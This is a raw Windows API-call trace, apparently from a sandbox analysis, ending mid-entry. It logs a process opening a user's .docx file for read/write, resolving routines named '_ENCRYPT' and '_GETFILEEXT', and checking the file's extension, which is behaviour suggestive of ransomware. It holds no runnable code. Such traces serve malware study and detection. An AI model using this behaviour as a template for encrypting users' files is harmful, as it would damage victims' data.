CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx", cchWideChar=97, lpMultiByteStr=0x7c10a8, cbMultiByte=97, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx", lpUsedDefaultChar=0x0) returned 97 [0035.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c10a8 | out: hHeap=0x770000) returned 1 [0035.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.777] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.777] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jrhg4bbw8x\\ulg-p8fths2s.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0035.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0035.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0035.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0035.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0035.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0035.777] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0035.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0035.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0035.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0035.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0035.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0035.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0035.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=97, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0035.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc2) returned 0x7c5448 [0035.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=97, lpWideCharStr=0x7c5448, cchWideChar=97 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx") returned 97 [0035.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0035.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd0) returned 0x791190 [0035.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0035.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0035.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0035.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0035.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0035.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0035.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0035.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0035.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0035.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0035.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0035.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0035.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0035.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.778] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0035.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0035.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0035.778] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0035.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0035.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0035.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0035.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0035.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0035.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0035.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0035.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0035.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0035.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0035.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0035.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0035.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0035.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0035.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0035.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0035.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0035.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0035.779] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0035.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0035.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0035.779] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0035.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0035.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0035.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0035.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0035.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0035.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0035.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0035.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0035.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0035.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0035.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0035.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0035.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0035.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0035.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0035.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0035.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0035.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0035.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0035.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0035.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0035.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0035.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0035.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0035.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.780] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0035.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0035.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0035.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0035.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0035.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0035.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0035.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0035.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.781] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0035.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0035.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0035.781] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0035.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0035.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0035.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0035.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.781] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0035.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0035.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0035.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0035.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0035.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0035.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0035.782] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0035.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0035.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0035.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0035.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0035.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0035.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0035.782] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0035.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0035.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0035.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.783] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0035.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0035.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889508 [0035.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889508, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0035.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0035.783] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0035.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0035.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0035.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0035.783] CloseHandle (hObject=0x128) returned 1 [0035.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.783] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0035.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0035.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0035.784] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0035.784] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0035.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0035.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0035.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0035.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0035.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0035.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0035.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0035.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0035.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0035.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0035.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0035.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0035.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0035.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.784] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.784] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0035.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0035.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0035.784] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.784] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.785] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0035.785] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.785] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0035.785] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0035.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.785] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 